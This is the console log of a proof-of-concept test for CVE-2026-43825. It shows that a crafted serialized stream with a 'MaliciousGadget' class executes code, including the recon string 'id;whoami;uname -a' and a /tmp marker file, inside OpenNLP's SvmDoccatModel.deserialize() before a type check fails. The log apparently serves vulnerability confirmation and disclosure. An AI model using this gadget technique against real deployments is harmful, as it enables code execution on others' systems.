=== CVE-2026-43825 PoC === Label: vulnerable Marker path: /tmp/opennlp_poc_marker_vuln.txt [*] Crafted payload size: 88 bytes [*] Payload contains MaliciousGadget (not in SvmDoccatModel graph) [*] Calling SvmDoccatModel.deserialize() with malicious stream... [GADGET EXECUTED] Arbitrary code ran during deserialization: id;whoami;uname -a [GADGET EXECUTED] Marker file written to: /tmp/opennlp_poc_marker_vuln.txt [!] VULNERABLE version: readObject() completed, cast failed AFTER [!] Exception: java.lang.ClassCastException: class MaliciousGadget cannot be cast to class opennlp.tools.ml.libsvm.doccat.SvmDoccatModel (MaliciousGadget and opennlp.tools.ml.libsvm.doccat.SvmDoccatModel are in unnamed module of loader 'app') [!!!] CODE EXECUTION CONFIRMED: gadget readObject() ran! [!!!] Marker file content: DESERIALIZATION_GADGET_EXECUTED: id;whoami;uname -a Thread: main Time: 2026-07-09T18:16:03.331869217Z Class: MaliciousGadget === RESULT === Label: vulnerable Exception type: ClassCastException Code executed during deserialization: true VERDICT: VULNERABLE ? unsafe deserialization allows code execution